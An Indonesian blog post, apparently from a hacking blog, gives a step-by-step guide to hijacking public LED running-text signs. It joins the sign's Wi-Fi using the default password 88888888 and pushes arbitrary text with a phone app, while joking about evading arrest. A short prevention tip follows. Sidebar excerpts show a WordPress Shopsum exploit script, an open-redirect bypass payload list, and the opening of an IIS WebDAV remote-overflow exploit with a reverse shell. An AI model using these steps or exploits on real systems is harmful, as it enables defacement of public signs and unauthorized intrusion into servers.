Langsung ke konten utama

Cara Mudah Hack Running Text dengan Smartphone Android


Cara Mudah Hack Running Text dengan Smartphone Android. Beberapa waktu yang lalu tepatnya bulan Desember 2018 sempat viral kasus peretasan running text SPBU dimana sang pelaku mengajak kita untuk subscribe ke channel PewDiePie. Setelah itu makin banyak kasus peretasan running text yang berada di kawasan umum atau pinggir jalan. Mungkin ada yang berpikir itu hebat, tapi tau gak sih kalo sebenernya cara hacknya gampang banget.
Cara ini bisa dilakukan dengan smartphone android. Prosesnya pun cepet, gak nyampe satu menit.
Pertama download dulu aplikasi XLGPowerLedPro di Playstore. Santai, bahasa aplikasinya bisa diubah ke Indonesia atau English juga. Sudah download dan install? Oke sekarang saya jelaskan bagaimana cara hack running textnya.

Cara Mudah Hack Running Text dengan Smartphone Android

Pertama, pastikan dulu kalian berada di dekat running text yang ingin diretas. Ya gak deket-deket amat gak apa-apa. Pokok SSID WiFinya masih kedetek. Soalnya kita bakal masuk ke jaringan WiFinya terlebih dahulu. Biasanya nama SSIDnya diawali dengan TF-WIFI_. Ada juga yang sudah diganti. Namun kita fokuskan ke yang SSID nya belom diganti karena biasanya yang SSIDnya masih default, password nya juga default.
Lalu masukkan passwordnya : 88888888 . Itu password defaultnya.
Setelah tersambung, buka aplikasi XLGPowerLedPro lalu klik Search Panel.
Jika SSIDnya memang memiliki running text, maka akan ada notifikasi bahwa LED ditemukan pada ip sekian…
Selanjutnya ke menu Program Edit lalu klik Add Program.
Lalu edit deh teksnya semau kalian.
Jika sudah selesai, klik tombol back. Lalu centang program yang baru kalian buat. Selanjutnya klik send program.
Jika ada bacaan success berarti berhasil.
Seharusnya sekarang running textnya sudah memunculkan kata dari program yang kalian kirim. Untuk foto running textnya maaf gak saya perlihatkan karena pengen ngefoto takut diciduk tadi h3h3.
Proses ini juga bisa dilakukan menggunakan laptop. Langkah-langkahnya sama. Tapi kan lebih simple pake hape kalo di tempat umum atau pinggir jalan. Kan gak lucu lagi di pinggir jalan tiba-tiba buka laptop terus ada running text berubah tampilan. Langsung diciduk nanti haha.

Cara agar Running Text Tidak Di Hack Orang Iseng

Karena mereka meretas running text dengan kredensial default, dengan mengubah password WiFi saya rasa bisa mencegah kasus peretasan running text. Untuk penjelasan lengkapnya bisa dicek di artikel berikut:
Jadi intinya, hack running text gak se “wah” yang kalian pikirkan. Stepnya gampang banget. Oke sekian tutorial kali ini. Semoga bermanfaat. Jika ini membantu, silahkan dishare juga ya.

Komentar

Postingan populer dari blog ini

Wordpress Premium Themes Shopsum Unauthenticated Configuration

# Exploit  Title : Wordpress Premium Themes Shopsum Unauthenticated Configuration Access Vulnerability # Author  : Mr.Buckethead # Date  : November 13th, 2014 # Category  : Web Applications # Vulnerability  : Unauthenticated Configuration Access # Tested  On : Windows 7 32-bit, Backbox # Dork  : inurl:/wp-content/themes/shopsum/hades_framework/ or use ur imagination #Exploit : http://localhost/path/wp-content/themes/shopsum/hades_framework/option_panel/ajax.php # POC  : Save File As Python (.py) = import httplib, urllib # target  site site = "victim" #<--- no http:// or https:// # path  to ajax.php url = "t/wp-content/themes/shopsum/hades_framework/option_panel/ajax.php" def ChangeOption(site, url, option_name, option_value): params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value}) headers = {"Content-type": "application/x-www-form-urlencoded", "Accept...

Open Redirect Bypass Cheat Sheet

Open Redirect Bypass Cheat Sheet   Yoo Cherry     August 3, 2019     Cheat Sheet ,  Web Hacking     No Comments Open Redirect Bypass Cheat Sheet.  Open redirect  adalah celah yang memungkinkan attacker untuk mengarahkan pengunjung dari situs terpercaya ke situs malware atau phising tanpa autentifikasi dari admin situs. Bergantung pada arsitektur situs web yang rentan, pengalihan bisa terjadi setelah tindakan tertentu, seperti login, dan terkadang hal itu bisa terjadi seketika saat memuat sebuah halaman. Open Redirect Bypass Cheat Sheet http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] http://XY>.7d8T\205pZM@[::ffff:216.58.214.206] http://0xd8.072.54990 http://www.whitelisteddomain.tld@0xd8.072.54990 http://3H6k7lIAiqjfNeN@0xd8.072.54990 http://XY>.7d8T\205pZM@0xd8.072.54990 http://0xd8.3856078 http://www.whitelisteddomain.tld@0xd8.3856078 http://3H6k7lIAiqjfNeN@0xd8.3856078 http://XY>.7d8T\205pZM@0xd8.3856078 ...

Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow

/*******************************************************************/ /* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */ /* --------------------------------------------------------------- */ /* this is the exploit for ntdll.dll through WebDAV. */ /* run a netcat ex: nc -L -vv -p 666 */ /* wb server.com your_ip 666 0 */ /* the shellcode is a reverse remote shell */ /* you need to pad a bit.. the best way I think is launching */ /* the exploit with pad = 0 and after that, the server will be */ /* down for a couple of seconds, now retry with pad at 1 */ /* and so on..pad 2.. pad 3.. if you haven't the shell after */ /* something like pad at 10 I think you better to restart from */ /* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */ /* on all the others servers it was at 2,3,4, etc..sometimes */ /* you can have the force with you, and get the shell in 1 try */ /* sometimes you need to pad more than 10 times ;) */ /* the shellcode was coded by m...